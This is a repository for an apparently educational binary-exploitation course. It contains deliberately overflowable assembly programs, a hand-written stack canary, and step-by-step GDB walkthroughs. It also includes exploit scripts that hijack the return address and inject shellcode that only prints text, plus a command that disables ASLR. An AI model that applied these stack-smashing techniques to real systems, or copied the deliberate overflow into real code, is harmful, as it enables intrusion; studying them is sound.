├── LICENSE ├── level_1 ├── Makefile ├── exploit.py ├── overflowme.s ├── overflowme_canary.s └── readme.md ├── level_2 ├── Makefile ├── exploit.py ├── overflowme.s ├── print_shellcode.s ├── print_shellcode_rm_bad_chars.s ├── readme.md ├── shellcode_formatter.py └── test_shell.c └── readme.md /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 digitalandrew 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /level_1/Makefile: -------------------------------------------------------------------------------- 1 | overflowme.o: overflowme.s 2 | as -g -o overflowme.o overflowme.s 3 | 4 | overflowme: overflowme.o 5 | gcc -o overflowme overflowme.o 6 | rm -f overflowme.o 7 | 8 | overflowme_canary.o: overflowme_canary.s 9 | as -g -o overflowme_canary.o overflowme_canary.s 10 | 11 | overflowme_canary: overflowme_canary.o 12 | gcc -o overflowme_canary overflowme_canary.o 13 | rm -f overflowme_canary.o 14 | 15 | all: overflowme.o overflowme overflowme_canary.o overflowme_canary 16 | 17 | clean: 18 | rm -f overflowme.o 19 | rm -f overflowme 20 | rm -f overflowme_canary.o 21 | rm -f overflowme_canary -------------------------------------------------------------------------------- /level_1/exploit.py: -------------------------------------------------------------------------------- 1 | import sys 2 | padding = b"\x41" * (512 + 8) # 512 bytes to fill the stack plus 8 to fill up the callers BP (RBP) 3 | return_address = b"\x41\x41\x41\x41\x41\x41" # this value will be overflowed into the return address allowing control of the instruction pointer (RIP) 4 | sys.stdout.buffer.write(padding + return_address) -------------------------------------------------------------------------------- /level_1/overflowme.s: -------------------------------------------------------------------------------- 1 | .file "overflowme.s" 2 | .intel_syntax noprefix 3 | .text 4 | .section .rodata 5 | intro_message: 6 | .string "My buffer is open for input, please don't overflow me!\n" 7 | .equ intro_length, .-intro_message -1 8 | 9 | outro_message: 10 | .string "Thanks for not overflowing me!\n" 11 | .equ outro_length, .-outro_message -1 12 | 13 | hidden_message: 14 | .string "Hey you're not supposed to be here!\n" 15 | .equ hidden_length, .-hidden_message -1 16 | 17 | 18 | .text 19 | .globl hidden_print 20 | .type hidden_print, 
@function 21 | hidden_print: 22 | # function prologue 23 | push rbp 24 | mov rbp, rsp 25 | # code to echo out message 26 | mov rax, 0x01 # 0x01 is write syscall 27 | mov rdi, 1 # setting fd to STDOUT (1) 28 | mov rdx, hidden_length # length of string to print 29 | lea rsi, hidden_message[rip] # pointer to start of message to print 30 | syscall 31 | # function epilogue 32 | mov rsp, rbp 33 | pop rbp 34 | ret 35 | 36 | .text 37 | .globl main 38 | .type main, @function 39 | 40 | 41 | .text 42 | .globl echo_print 43 | .type echo_print, @function 44 | echo_print: 45 | # function prologue 46 | push rbp 47 | mov rbp, rsp 48 | sub rsp, 512 # allocate space on stack for buffer to hold input string (this is the equivalent in C of a local variable declared as char buffer[512]) 49 | # code to read user input and store onto stack 50 | mov rax, 0 # setting rax for read syscall 51 | mov rdi, 0 # fd for STDIN (0) 52 | lea rsi, QWORD PTR -512[rbp] # pointer to allocated space on the stack 53 | mov rdx, 1023 # this should match buffer size -1 to prevent overflow 54 | before_read_syscall: # label to set breakpoint before filling buffer with read syscall 55 | syscall 56 | # code to echo out message 57 | mov rdx, rax # length of string input is returned from read syscall into rax, moving it into rdx 58 | mov rax, 0x01 # 0x01 is write syscall 59 | mov rdi, 1 # setting fd to STDOUT (1) 60 | lea rsi, QWORD PTR -512[rbp] # pointer to start of message to print 61 | syscall 62 | # function epilogue 63 | before_function_return: # label to set breakpoint before the function return 64 | mov rsp, rbp 65 | pop rbp 66 | ret 67 | 68 | .text 69 | .globl main 70 | .type main, @function 71 | main: 72 | push rbp 73 | mov rbp, rsp 74 | # code to print intro message 75 | mov rax, 0x01 # 0x01 is write syscall 76 | mov rdi, 1 # setting fd to STDOUT (1) 77 | lea rsi, intro_message[rip] # pointer to start of message to print 78 | mov rdx, intro_length # length of string to print 79 | syscall 80 | 
before_function_call: # label to set breakpoint before the function call 81 | call echo_print 82 | return_from_function: # label added to easily find return address from function call 83 | # code to print outro message 84 | mov rax, 0x01 # 0x01 is write syscall 85 | mov rdi, 1 # setting fd to STDOUT (1) 86 | lea rsi, outro_message[rip] # pointer to start of message to print 87 | mov rdx, outro_length # length of string to print 88 | syscall 89 | mov eax, 0 # return 0 for no error 90 | # function epilogue 91 | mov rsp, rbp 92 | pop rbp 93 | ret 94 | .size main, .-main 95 | .section .note.GNU-stack,"",@progbits 96 | -------------------------------------------------------------------------------- /level_1/overflowme_canary.s: -------------------------------------------------------------------------------- 1 | .file "overflowme_canary.s" 2 | .intel_syntax noprefix 3 | .text 4 | .section .rodata 5 | intro_message: 6 | .string "My buffer is open for input, please don't overflow me!\n" 7 | .equ intro_length, .-intro_message -1 8 | 9 | outro_message: 10 | .string "Thanks for not overflowing me!\n" 11 | .equ outro_length, .-outro_message -1 12 | 13 | 14 | overflow_message: 15 | .string "\nHey you overflowed me!\n" 16 | .equ overflow_length, .-overflow_message -1 17 | 18 | .text 19 | .globl echo_print 20 | .type echo_print, @function 21 | echo_print: 22 | # start of function prologue 23 | push rbp 24 | mov rbp, rsp 25 | # code to store stack canary onto the stack 26 | mov rcx, fs:40 # stack canary from OS can be read from fs:40 27 | push rcx # push the stack canary onto the stack directly below the caller's BP and return address (it lands at rbp-8) 28 | 29 | sub rsp, 512 # allocate space on stack for buffer to hold input string (this is the equivalent in C of a local variable declared as char buffer[512]) 30 | # code to read user input and store onto stack 31 | mov rax, 0 # setting rax for read syscall 32 | mov rdi, 0 # fd for STDIN (0) 33 | lea rsi, QWORD PTR -520[rbp] # pointer to allocated 
space on the stack (the buffer sits below the 8-byte canary, so it starts at rbp-520, not rbp-512) 34 | mov rdx, 1023 # this should match the buffer size (512) to prevent overflow 35 | syscall 36 | # code to echo out message 37 | mov rdx, rax # length of string input is returned from read syscall into rax, moving it into rdx 38 | mov rax, 0x01 # 0x01 is write syscall 39 | mov rdi, 1 # setting fd to STDOUT (1) 40 | lea rsi, QWORD PTR -520[rbp] # pointer to start of message to print (same buffer start as above) 41 | syscall 42 | # code to verify stack canary has not been tampered with 43 | mov rcx, fs:40 # re-read the stack canary from the OS 44 | xor rcx, QWORD PTR -8[rbp] # compare the stack canary from the OS with the copy that was placed onto the stack, if they are equal then XOR will return 0 45 | test rcx, rcx # check if zero which means stack canary has not been modified 46 | jnz overflow_detected # if not zero, this means the stack is corrupted and we should not return from the call 47 | mov rsp, rbp 48 | pop rbp 49 | ret 50 | overflow_detected: 51 | # Start of function code to print overflow detected message, this is similar to the "*** stack smashing detected ***: terminated" message and functionality in the default stack canaries implemented by GCC 52 | mov rax, 0x01 # 0x01 is write syscall 53 | mov rdi, 1 # setting fd to STDOUT (1) 54 | lea rsi, overflow_message[rip] # pointer to start of message to print 55 | mov rdx, overflow_length # length of string to print 56 | syscall 57 | # Syscall to exit 58 | mov rax, 60 # 60 is the exit syscall 59 | mov rdi, 1 # exit status 1 to signal an error 60 | syscall 61 | 62 | .text 63 | .globl main 64 | .type main, @function 65 | main: 66 | push rbp 67 | mov rbp, rsp 68 | # Start of code to print intro message 69 | mov rax, 0x01 # 0x01 is write syscall 70 | mov rdi, 1 # setting fd to STDOUT (1) 71 | lea rsi, intro_message[rip] # pointer to start of message to print 72 | mov rdx, intro_length # length of string to print 73 | syscall 74 | call echo_print 75 | # Start of code to print outro message 76 | mov rax, 0x01 # 0x01 is write 
syscall 77 | mov rdi, 1 # setting fd to STDOUT (1) 78 | lea rsi, outro_message[rip] # pointer to start of message to print 79 | mov rdx, outro_length # length of string to print 80 | syscall 81 | mov eax, 0 82 | mov rsp, rbp 83 | pop rbp 84 | ret 85 | .size main, .-main 86 | .section .note.GNU-stack,"",@progbits 87 | -------------------------------------------------------------------------------- /level_1/readme.md: -------------------------------------------------------------------------------- 1 | # Overflowme Level 1 - The Basics 2 | 3 | Your challenge, should you accept it, is to get the overflowme binary to print out the hidden message "Hey you're not supposed to be here!" without modifying the source code. If you want to follow along with the walkthrough, the rest of the readme will guide you through step-by-step instructions. 4 | 5 | ## Step 1 - Assemble and Link the Binary 6 | 7 | This level makes use of assembly source code to help teach the basics of binary exploitation and the call stack. The assembly code has been tweaked from compiled C code to make it a bit more readable, but it closely mimics a stack overflow that could be present in poorly written C code. 8 | 9 | A Makefile has been provided to assemble and link the binary. 10 | 11 | ```bash 12 | make overflowme 13 | ``` 14 | 15 | You can give the binary a spin now. 16 | 17 | ```bash 18 | ./overflowme 19 | ``` 20 | 21 | The binary performs an echo print that will echo back whatever you input to it (so long as you don't overflow it...). 22 | 23 | ## Step 2 - Source Code Review 24 | 25 | The binary is tempting us to overflow it, so let's review the source code and see how we can. 26 | 27 | Start from the `main:` label, which denotes the main function and is where the program starts. A few lines in, the `echo_print` function is called; this is where the user input is taken and printed back out. Let's investigate this function further. 
28 | 29 | The first two lines perform what is called the function prologue. It preserves the caller's base pointer and sets the callee's base pointer (the one used inside the function) to the current stack pointer. This starts the function's stack frame on top of the caller's, so the caller's frame can be restored when the function returns. Next, the stack pointer is moved down by subtracting 512 from it (recall that the stack grows downwards). This allocates space on the stack for local variables and is the equivalent in C of declaring a local array with `char buffer[512];`. 30 | 31 | The next 4 lines set up a read syscall. Each line of assembly is commented so you can review what it does. If you want more details about syscalls, this [document](https://www.chromium.org/chromium-os/developer-library/reference/linux-constants/syscalls/) is an excellent reference. The important line for our investigation is the one that sets RDX to 1023. RDX is the maximum number of bytes the read syscall will accept, and it is supposed to keep the input from overflowing the buffer that holds it. Above this line, a pointer to the start of the buffer allocated on the stack (512 bytes below the base pointer) is loaded into RSI. This is where the input from the read syscall will be stored. You've probably already noticed the mistake: we allocated a buffer of 512 bytes but allow up to 1023 bytes to be read in. 32 | 33 | ## Step 3 - Overflowing Overflowme 34 | 35 | We're now ready to overflow the buffer and see what happens. To do so we'll need an input of more than 512 characters. Instead of typing this manually we'll use a Python script. I've included one to work from that in its current state prints 526 "A"s (520 bytes of padding plus a 6-byte placeholder for the return address). We can pipe its output into the overflowme binary. 
36 | 37 | ```bash 38 | python3 exploit.py | ./overflowme 39 | ``` 40 | 41 | You should see that the program echoed back the A's, but afterwards it crashed with a segmentation fault. Segmentation faults usually occur when the program attempts to access an invalid memory address or memory that it doesn't have permission to access. 42 | 43 | ## Step 4 - Investigating with GDB 44 | 45 | To understand why this is happening we'll investigate further with GDB. Before we do so, it will make things a bit easier in GDB to store the output of the Python script in a file we can pass in. 46 | 47 | ```bash 48 | python3 exploit.py > AAAA 49 | ``` 50 | 51 | Now we can launch GDB to step through the binary. 52 | 53 | ```bash 54 | gdb ./overflowme 55 | ``` 56 | 57 | First, let's set up some breakpoints to stop the program at specific key points so we can investigate. To do so in GDB you can use "b" followed by either a line number or a label. Set the following: 58 | 59 | `b before_function_call` 60 | 61 | `b before_read_syscall` 62 | 63 | `b before_function_return` 64 | 65 | Now let's run the program but redirect the file we created into stdin. 66 | 67 | `r < AAAA` 68 | 69 | GDB will automatically halt execution at the first breakpoint, before we call the `echo_print` function. At this point let's investigate a few key pieces of information. First, let's check what the current base pointer is. This can be displayed with: 70 | 71 | `i r rbp` 72 | 73 | For me the base pointer is currently 0x7fffffffdd60, however it may be different for you. 74 | 75 | Next, let's check the return address from the function using the label `return_from_function`: 76 | 77 | `info address return_from_function` 78 | 79 | On my system, the return address is at 0x5555555551bf (again it might be different for you). 80 | 81 | For now, let's keep note of both of these addresses and continue execution of the program by pressing `c`. 
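As an aside, the base pointer noted above can be related to the frame that `echo_print` is about to build. The sketch below is only an illustration, not part of the repository: the helper name `echo_print_frame` is hypothetical, and it assumes (as in `overflowme.s`) that `main` has no locals, so RSP equals RBP at `before_function_call`, that `call` pushes an 8-byte return address, and that the prologue pushes the 8-byte caller's RBP. The input value is the example address from this walkthrough; yours will likely differ.

```python
BUFFER_SIZE = 512  # matches `sub rsp, 512` in echo_print
WORD = 8           # size of one pushed 64-bit value


def echo_print_frame(main_rbp: int) -> dict:
    """Predict where echo_print's frame lands, given main's RBP (hypothetical helper)."""
    return_slot = main_rbp - WORD        # `call echo_print` pushes the return address
    saved_rbp_slot = return_slot - WORD  # `push rbp` in the prologue
    echo_rbp = saved_rbp_slot            # `mov rbp, rsp`
    return {
        "buffer_start": echo_rbp - BUFFER_SIZE,  # `lea rsi, -512[rbp]`
        "echo_rbp": echo_rbp,
        "saved_rbp_slot": saved_rbp_slot,
        "return_slot": return_slot,
    }


frame = echo_print_frame(0x7FFFFFFFDD60)  # example value from the walkthrough
for name, addr in frame.items():
    print(f"{name:15} {addr:#x}")

# Distance from the first buffer byte to the return address slot
print(frame["return_slot"] - frame["buffer_start"])
```

The final number is the 512 + 8 padding that `exploit.py` writes before the bytes intended for the return address.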
82 | 83 | GDB has again halted execution, this time right before the read syscall which will fill our buffer up with A's. In the function prologue, we saved the caller's base pointer to the stack, and the current base pointer now points at that saved value. We can verify this by reading the 8 bytes starting at the current base pointer with: 84 | 85 | `x/xg $rbp` 86 | 87 | The second value displayed (in white with GDB's default colors) is the contents and the first value (in blue) is the address being read from. Notice how the contents match the base pointer we saw before the function call. 88 | 89 | After the function is done executing it needs to know where to return to in the program. This is done by retrieving the return address from the stack. When a function is called, the return address is pushed onto the stack directly before program control is switched to the function code. We can see this return address by looking at the memory starting 8 bytes above the current base pointer with: 90 | 91 | `x/xg $rbp+8` 92 | 93 | Note how at this point this matches the address we saw for the return label. This implementation of the call stack is what makes stack overflows potentially so dangerous: if we can overwrite the stack up to where the return address is stored, then we can control the flow of the program. A visual representation of the stack at this point is provided below. 94 | 95 |  96 | 97 | Let's continue with the program execution with `c` again. 98 | 99 | The function works as expected, printing out the A's we input, and at this point it has not crashed. GDB has again halted execution, after the syscall but before the function performs the epilogue and returns. We can investigate the caller's base pointer and the return address again by reusing the above commands. As you can see, they are both filled with 41 (which is the hex ASCII representation of A). The same stack diagram is shown below with the current state of the stack. 100 | 101 | Continuing one last time with `c` you'll notice that now we get a segmentation fault. 
When the function attempts to return, the return address has been corrupted, so the program tries to fetch its next instruction from an address it cannot access, which results in a segmentation fault. 102 | 103 | Before we exit GDB, let's get one other piece of key information we will need: the address of the `hidden_print` function, so we can craft an exploit to jump there. 104 | 105 | To do so rerun the program with `r` and then display the address with: 106 | 107 | `info address hidden_print` 108 | 109 | Mine is located at 0x555555555129. Again, yours may be different so make sure to take note of it. 110 | 111 | ## Step 5 - Craft the Exploit 112 | 113 | Now that we understand how the call stack works and what happens when we overflow the stack past the caller's base pointer and into the return address, we can craft an exploit to take control of program flow and jump to the hidden print. 114 | 115 | Let's start by updating the exploit script with the return address instead of just 41s. One important thing to keep in mind is that x86-64 is little-endian, so the least significant byte of an address is stored first in memory. This means we need to write the address bytes in our exploit in reverse order from how the address is read. For example, my address of 0x555555555129 would translate into "\x29\x51\x55\x55\x55\x55". Only 6 bytes are needed because the top two bytes of the original 8-byte return address are already zero. 116 | 117 | Let's create another file with our updated exploit. 118 | 119 | ```bash 120 | python3 exploit.py > jmp2hidden 121 | ``` 122 | 123 | ## Step 6 - Launch the Exploit 124 | 125 | Now let's re-run the binary with GDB using the same steps to set the same breakpoints, except this time redirect the jmp2hidden file into stdin with `r < jmp2hidden`. 126 | 127 | If you'd like you can investigate the return address and base pointer at each breakpoint, however, the one we are most concerned with is the one right before the return from the function call. 
Use `c` to continue until that breakpoint and then review the return address with: 128 | 129 | `x/xg $rbp+8` 130 | 131 | If everything worked with the exploit you should see the address for `hidden_print` listed. An example of the stack with my return address is shown below. 132 | 133 |  134 | 135 | Continue execution again with `c` and you should now see the hidden message printed out followed by another segmentation fault. 136 | 137 | Congrats, your exploit worked! If you're curious about why the program still ends with a segmentation fault, this is because we didn't properly call the `hidden_print` function. Instead we hijacked the instruction pointer and moved directly there. Because of this, no return address was pushed to the stack, so when `hidden_print` attempts to return it pops a garbage return address, which causes a segmentation fault. In future levels, we'll look at how we can prevent this if we want to keep the exploit from crashing our program. 138 | 139 | ## Step 7 - Remediation and Protections 140 | 141 | In this step, we'll take a look at some remediation and protections that we can put in place to prevent stack overflows and other memory corruption attacks. These are important to understand because in later levels we'll also look at how they can potentially be bypassed. 142 | 143 | Of course, the easiest remediation step is to make sure the number of bytes we'll accept from the read syscall matches the size of the buffer. In a higher-level language like C, this could also mean using bounds-checked versions of functions, for example snprintf() instead of sprintf(). 144 | 145 | Outside of ensuring the code doesn't contain overflow vulnerabilities, modern operating systems have multiple protections built in to prevent memory corruption attacks like a stack overflow. We'll explore two of them at this level. The first one is ASLR which stands for Address Space Layout Randomization. 
This protection randomizes the address space of binaries/executables when they are run. This makes exploitation much more difficult because we won't know the addresses of things like the stack and other functions. To see this in action, try to run the updated exploit with the return address against the overflowme binary outside of GDB. 146 | 147 | ```bash 148 | python3 exploit.py | ./overflowme 149 | ``` 150 | 151 | If you're running on a modern Linux distro then you will get the same result as you did with the exploit that has just A's: a seg fault after the echo, without the hidden message being printed. This is because GDB disables ASLR for the binaries it runs, as debugging is easier with it off. When the binary is run outside of GDB, ASLR is enabled and the address of the `hidden_print` function is different on each run, which prevents us from knowing what address is needed to jump to it. You can temporarily turn off ASLR with the following command: 152 | 153 | ```bash 154 | sudo sysctl -w kernel.randomize_va_space=0 155 | ``` 156 | 157 | Now if you re-run the exploit it should work and jump you to the hidden print. If you want to turn ASLR back on you can set it back with the following: 158 | 159 | ```bash 160 | sudo sysctl -w kernel.randomize_va_space=2 161 | ``` 162 | 163 | We'll learn more about some methods to chain vulnerabilities together to bypass ASLR in future levels. 164 | 165 | The next protection we'll look at is stack canaries. A stack canary is a randomized value retrieved from the operating system that is placed onto the stack directly below the caller's base pointer after the function prologue. Before returning from a function, the stack canary that was placed onto the stack is checked against the one that the operating system provided. If they don't match, something has corrupted the memory and potentially overwritten the return address. Instead of returning from the function, the process will display an error message and exit. 
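The canary check described above can be modelled in a few lines of Python. This is a toy simulation of the idealised layout (buffer, then canary, then the caller's base pointer and return address), not a reproduction of the assembly: `echo_print_model` is a hypothetical name, `os.urandom` merely stands in for the value the operating system provides, and memory above the modelled frame is ignored.

```python
import os

BUFFER_SIZE = 512  # matches `sub rsp, 512`
CANARY_SIZE = 8


def echo_print_model(user_input: bytes, max_read: int = 1023) -> str:
    """Toy model of a canary-protected stack frame (illustrative only)."""
    canary = os.urandom(CANARY_SIZE)  # stand-in for the OS-provided canary
    # Layout from low to high addresses:
    # buffer | canary | caller's RBP | return address
    frame = bytearray(BUFFER_SIZE) + bytearray(canary) + bytearray(16)
    # read() copies at most max_read bytes, starting at the buffer's first byte.
    # Bytes that would land above the modelled frame are dropped for simplicity.
    data = user_input[:max_read][:len(frame)]
    frame[:len(data)] = data
    # Before returning, compare the copy on the stack with the original value.
    stored = bytes(frame[BUFFER_SIZE:BUFFER_SIZE + CANARY_SIZE])
    if stored != canary:
        return "overflow detected"
    return "returned normally"


print(echo_print_model(b"A" * 100))  # fits inside the buffer
print(echo_print_model(b"A" * 526))  # same length as the level 1 exploit
```

With the default limit of 1023 the second call should report an overflow, because the A's run through the canary before they reach the return address. Passing `max_read=512` models the remediation of matching the read size to the buffer.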
166 | 167 | To see an implementation of stack canaries in practice let's build a modified version of overflowme. 168 | 169 | ```bash 170 | make overflowme_canary 171 | ``` 172 | 173 | If you run the binary normally without overflowing the buffer you'll notice it functions as you would expect. If you run it again and pass in the exploit as input you'll notice a different message displayed: "Hey you overflowed me!". Let's take a look at the source code for overflowme_canary and see how this works. 174 | 175 | Inside `echo_print`, on the third line of the function, the stack canary is read from a special location (`fs:40`) where the OS places it. It is then pushed onto the stack. 176 | 177 |  178 | 179 | The function then continues as normal until directly before the return, where the stack canary is read from `fs:40` again and checked against the copy on the stack. If they are equal the function proceeds and returns as normal. If they don't match, the stack overflow message is printed and the process exits. 180 | 181 | When working in higher-level languages like C, stack canaries are typically added by the compiler, for example through GCC's `-fstack-protector` family of options, which many distributions enable by default. In this example, I've hand-written one in assembly so that it's easier to see how they work, however, the implementation from GCC or other compilers is very similar. 182 | 183 | Similar to ASLR, there are ways that stack canaries can be bypassed by chaining together vulnerabilities. We'll learn more about this in future levels as well. 184 | 185 | ## Nice Job! 186 | 187 | That wraps up the first level of overflowme. In the next level we'll take a look at upgrading our exploit from just jumping to another place in the program to jumping to shellcode that we load onto the stack. 
188 | 189 | 190 | -------------------------------------------------------------------------------- /level_2/Makefile: -------------------------------------------------------------------------------- 1 | overflowme.o: overflowme.s 2 | as -g -o overflowme.o overflowme.s 3 | 4 | overflowme: overflowme.o 5 | gcc -z execstack -o overflowme overflowme.o 6 | rm -f overflowme.o 7 | 8 | print_shellcode.o: print_shellcode.s 9 | as -g -o print_shellcode.o print_shellcode.s 10 | 11 | print_shellcode: print_shellcode.o 12 | ld -e start -o print_shellcode print_shellcode.o 13 | rm -f print_shellcode.o 14 | 15 | print_shellcode_rm_bad_chars.o: print_shellcode_rm_bad_chars.s 16 | as -g -o print_shellcode_rm_bad_chars.o print_shellcode_rm_bad_chars.s 17 | 18 | print_shellcode_rm_bad_chars: print_shellcode_rm_bad_chars.o 19 | ld -e start -o print_shellcode_rm_bad_chars print_shellcode_rm_bad_chars.o 20 | rm -f print_shellcode_rm_bad_chars.o 21 | 22 | all: overflowme.o overflowme print_shellcode.o print_shellcode print_shellcode_rm_bad_chars.o print_shellcode_rm_bad_chars 23 | 24 | clean: 25 | rm -f overflowme.o 26 | rm -f overflowme 27 | rm -f print_shellcode 28 | rm -f print_shellcode_rm_bad_chars -------------------------------------------------------------------------------- /level_2/exploit.py: -------------------------------------------------------------------------------- 1 | # update return address you need (somewhere in the stack where the nops are) 2 | # Return address we want = 0x7fffffffda20 3 | # 512 (size of stack) + 8 (callers bp) = 520 4 | 5 | import sys 6 | stack_plus_bp=520 7 | shellcode = b"\x48\xb9\x54\x43\x4d\x52\x55\x4c\x45\x5a\x51\x48\x31\xc0\xb0\x01\x48\x89\xc7\x48\x89\xe6\x48\x31\xd2\xb2\x08\x0f\x05" 8 | padding = b"\x41" * 128 9 | nops = b"\x90" * (stack_plus_bp - len(shellcode) - len(padding)) 10 | return_address = b"\x20\xda\xff\xff\xff\x7f" 11 | sys.stdout.buffer.write(nops + shellcode + padding + return_address) 
-------------------------------------------------------------------------------- /level_2/overflowme.s: -------------------------------------------------------------------------------- 1 | .file "overflowme.s" 2 | .intel_syntax noprefix 3 | .text 4 | .section .rodata 5 | intro_message: 6 | .string "My buffer is open for input, please don't overflow me!\n" 7 | .equ intro_length, .-intro_message -1 8 | 9 | outro_message: 10 | .string "Thanks for not overflowing me!\n" 11 | .equ outro_length, .-outro_message -1 12 | 13 | hidden_message: 14 | .string "Hey you're not supposed to be here!\n" 15 | .equ hidden_length, .-hidden_message -1 16 | 17 | 18 | .text 19 | .globl hidden_print 20 | .type hidden_print, @function 21 | hidden_print: 22 | # function prologue 23 | push rbp 24 | mov rbp, rsp 25 | # code to echo out message 26 | mov rax, 0x01 # 0x01 is write syscall 27 | mov rdi, 1 # setting fd to STDOUT (1) 28 | mov rdx, hidden_length # length of string to print 29 | lea rsi, hidden_message[rip] # pointer to start of message to print 30 | syscall 31 | # function epilogue 32 | mov rsp, rbp 33 | pop rbp 34 | ret 35 | 36 | .text 37 | .globl main 38 | .type main, @function 39 | 40 | 41 | .text 42 | .globl echo_print 43 | .type echo_print, @function 44 | echo_print: 45 | # function prologue 46 | push rbp 47 | mov rbp, rsp 48 | sub rsp, 512 # allocate space on stack for buffer to hold input string (this is the equivalent in C of a local variable declared as char buffer[512]) 49 | # code to read user input and store onto stack 50 | mov rax, 0 # setting rax for read syscall 51 | mov rdi, 0 # fd for STDIN (0) 52 | lea rsi, QWORD PTR -512[rbp] # pointer to allocated space on the stack 53 | mov rdx, 1023 # this should match buffer size -1 to prevent overflow 54 | before_read_syscall: # label to set breakpoint before filling buffer with read syscall 55 | syscall 56 | # code to echo out message 57 | mov rdx, rax # length of string 
input is returned from read syscall into rax, moving it into rdx 58 | mov rax, 0x01 # 0x01 is write syscall 59 | mov rdi, 1 # setting fd to STDOUT (1) 60 | lea rsi, QWORD PTR -512[rbp] # pointer to start of message to print 61 | syscall 62 | # function epilogue 63 | before_function_return: # label to set breakpoint before the function return 64 | mov rsp, rbp 65 | pop rbp 66 | ret 67 | 68 | .text 69 | .globl main 70 | .type main, @function 71 | main: 72 | push rbp 73 | mov rbp, rsp 74 | # code to print intro message 75 | mov rax, 0x01 # 0x01 is write syscall 76 | mov rdi, 1 # setting fd to STDOUT (1) 77 | lea rsi, intro_message[rip] # pointer to start of message to print 78 | mov rdx, intro_length # length of string to print 79 | syscall 80 | before_function_call: # label to set breakpoint before the function call 81 | call echo_print 82 | return_from_function: # label added to easily find return address from function call 83 | # code to print outro message 84 | mov rax, 0x01 # 0x01 is write syscall 85 | mov rdi, 1 # setting fd to STDOUT (1) 86 | lea rsi, outro_message[rip] # pointer to start of message to print 87 | mov rdx, outro_length # length of string to print 88 | syscall 89 | mov eax, 0 # return 0 for no error 90 | # function epilogue 91 | mov rsp, rbp 92 | pop rbp 93 | ret 94 | .size main, .-main 95 | .section .note.GNU-stack,"",@progbits 96 | -------------------------------------------------------------------------------- /level_2/print_shellcode.s: -------------------------------------------------------------------------------- 1 | .intel_syntax noprefix 2 | .text 3 | .globl start 4 | 5 | # Program to print out TCMRULEZ 6 | start: 7 | mov rcx, 0x5A454C55524D4354 # setting up to push string onto the stack in reverse order 8 | push rcx 9 | mov rax, 1 # setting rax to 1 for write syscall 10 | mov rdi, 1 # setting rdi to fd of stdout 11 | mov rsi, rsp # stack pointer pointing to string to print 12 | xor rdx, rdx # zeroing out rdx 13 | mov rdx, 8 # length of 
string to print 14 | syscall 15 | -------------------------------------------------------------------------------- /level_2/print_shellcode_rm_bad_chars.s: -------------------------------------------------------------------------------- 1 | .intel_syntax noprefix 2 | .text 3 | .globl start 4 | 5 | # Program to print out TCMRULEZ 6 | start: 7 | mov rcx, 0x5A454C55524D4354 # setting up to push string onto the stack in reverse order 8 | push rcx 9 | xor rax, rax # zeroing out rax 10 | mov al, 1 # setting rax to 1 for write syscall 11 | mov rdi, rax # setting rdi to fd of stdout 12 | mov rsi, rsp # stack pointer pointing to string to print 13 | xor rdx, rdx # zeroing out rdx 14 | mov dl, 8 # length of string to print 15 | syscall 16 | -------------------------------------------------------------------------------- /level_2/readme.md: -------------------------------------------------------------------------------- 1 | # Overflowme Level 2 - Shellcodin' and Exploitin' 2 | 3 | Your challenge, should you accept it, is to get the overflowme binary to print out the message "TCMRULEZ" without modifying the source code. If you want to follow along with the walkthrough, the rest of the readme will guide you through step-by-step instructions. 4 | 5 | ## Step 1 - Assemble and Link the Binary 6 | 7 | This level makes use of assembly source code to help teach the basics of binary exploitation and the call stack. The assembly code has been tweaked from compiled C code to make it a bit more readable, but it closely mimics a stack overflow that could be present in poorly written C code. 8 | 9 | A Makefile has been provided to assemble and link the binary. 10 | 11 | ```bash 12 | make overflowme 13 | ``` 14 | 15 | You can give the binary a spin now. 16 | 17 | ```bash 18 | ./overflowme 19 | ``` 20 | 21 | The binary performs an echo print that will echo back whatever you input to it (so long as you don't overflow it...). 
22 |
23 | ## Step 2 - Stack Smashing Fundamentals
24 |
25 | In the previous level we found that the binary was vulnerable to a stack overflow. By crafting a specific input (which we turned into an exploit) we were able to get the binary to jump to a section of code we shouldn't have access to and execute it to print the hidden message. In this challenge we need to print out a new message that isn't included anywhere in the binary. To do this, we'll need to exploit the stack overflow to run code that we supply instead of jumping to pre-existing code in the binary. We'll do that with a stack smashing attack, one of the oldest forms of stack overflow exploits. In this exploit, instead of filling up the stack with A's or random characters, we'll craft an input that fills the stack with code that we've written and then overwrites the return address so it points to the start of that code on the stack.
26 |
27 | ## Step 3 - Writing Shellcode
28 |
29 | When the overflowme binary is run, its contents are loaded into memory as actual binary (hence why it's called a binary). The executable sections of the binary, which are the "code", are in machine code format, which is the 1s and 0s (or hexadecimal) representation of assembly. In order to inject code into memory through the stack overflow vulnerability we found, we'll need it to be in raw machine code, which when working on exploits is commonly referred to as shellcode. In our case we won't be using it to spawn a shell, but that's the most common use of shellcode, which is how it got the name.
30 |
31 | There are multiple ways to generate shellcode. One of the most common is to use a tool like msfvenom to generate it for you. However, it's best to learn how to write it yourself, because you'll frequently be up against constraints that require custom shellcode, and auto-generated shellcode will most likely get picked up by AV and other detections.
32 |
33 | In this walkthrough I'm going to outline the method that I use.
34 |
